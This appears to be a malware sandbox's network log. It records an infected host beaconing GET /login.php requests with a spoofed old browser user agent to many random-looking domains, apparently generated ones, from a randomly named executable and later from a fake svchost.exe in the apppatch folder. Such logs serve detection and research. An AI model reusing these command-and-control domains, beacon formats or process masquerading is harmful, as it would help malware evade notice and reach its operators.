Nov 11, 2024 18:13:50.418085098 CET	334	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345230\|1731345181\|9\|4\|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.6	59173	18.208.156.248	80	936	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:54.726907015 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Nov 11, 2024 18:13:55.167536974 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:55 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345235\|1731345181\|11\|4\|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.6	59181	75.2.71.199	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:55.949146986 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Nov 11, 2024 18:13:56.506236076 CET	166	IN	HTTP/1.1 308 Permanent Redirect Connection: close Location: https://puzylyp.com/login.php Server: Caddy Date: Mon, 11 Nov 2024 17:13:56 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.6	59180	188.114.97.3	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:00.967616081 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Nov 11, 2024 18:14:01.381478071 CET	972	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:14:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HnwvQDbGytbq5CXrtmcwvXRIsFGqGYXi8DgvT6yYwjUlFykHlXIVoztU%2Fluo%2BbIuUvFUWeJAGh4BDD%2FmhF7idBrFGqutLjlhyHX%2F2VrTBNThpMJ5AxRk%2Bt7z12HnAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fea8c6d97ab96-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=11751&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=37&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.6	59179	44.221.84.105	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:00.967902899 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Nov 11, 2024 18:14:01.378559113 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:14:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345241\|1731345181\|14\|4\|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Nov 11, 2024 18:14:01.381464958 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:14:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345241\|1731345181\|14\|4\|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.6	59178	44.221.84.105	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:00.967953920 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345224\|1731345181\|21\|2\|0
Nov 11, 2024 18:14:01.378519058 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:14:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345241\|1731345181\|19\|3\|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Nov 11, 2024 18:14:01.381377935 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:14:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345241\|1731345181\|19\|3\|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.6	56239	3.94.10.34	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:00.978436947 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.6	56236	199.59.243.227	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:00.978504896 CET	305	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.6	56240	18.208.156.248	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:00.978547096 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.6	56237	208.100.26.245	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:00.978593111 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.6	56238	199.191.50.83	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:00.978631973 CET	281	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478890781963739088

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.6	56241	154.212.231.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:00.980814934 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.6	56235	23.253.46.64	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:01.005676031 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.6	64560	162.255.119.102	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:52.330401897 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Nov 11, 2024 18:14:52.859977007 CET	303	IN	HTTP/1.1 302 Found Date: Mon, 11 Nov 2024 17:14:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 55 Connection: keep-alive Location: http://www.gahyqah.com/login.php X-Served-By: Namecheap URL Forward Server: namecheap-nginx Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.6	64561	5.79.71.205	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:52.341296911 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.6	64562	188.114.97.3	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:52.410851002 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Nov 11, 2024 18:14:53.430967093 CET	797	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBarMLYFIZT1%2BL4MkS%2BHzKT2Z4IHmywH0r39%2FEgtKpkQ6VO9ZmTqs7Dh%2FeyHbU7PVpy5q5qyHcrIqFv269RmR96FSyAoAveTH4L3eYuWcCCJ6fJTUFVPWBnYEyntTw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0febcfeab1de92-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1108&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 11, 2024 18:14:53.431031942 CET	173	IN	Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:14:53.431041956 CET	173	IN	Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:14:53.431693077 CET	970	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBarMLYFIZT1%2BL4MkS%2BHzKT2Z4IHmywH0r39%2FEgtKpkQ6VO9ZmTqs7Dh%2FeyHbU7PVpy5q5qyHcrIqFv269RmR96FSyAoAveTH4L3eYuWcCCJ6fJTUFVPWBnYEyntTw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0febcfeab1de92-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1108&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.6	64563	208.100.26.245	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:52.545742989 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Nov 11, 2024 18:14:53.017271042 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:14:52 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:14:53.019323111 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Nov 11, 2024 18:14:53.430891037 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:14:53.431586981 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:14:53.668462038 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.6	64564	75.2.71.199	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:52.588963985 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Nov 11, 2024 18:14:53.018652916 CET	166	IN	HTTP/1.1 308 Permanent Redirect Connection: close Location: https://puzylyp.com/login.php Server: Caddy Date: Mon, 11 Nov 2024 17:14:52 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.6	64565	44.221.84.105	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
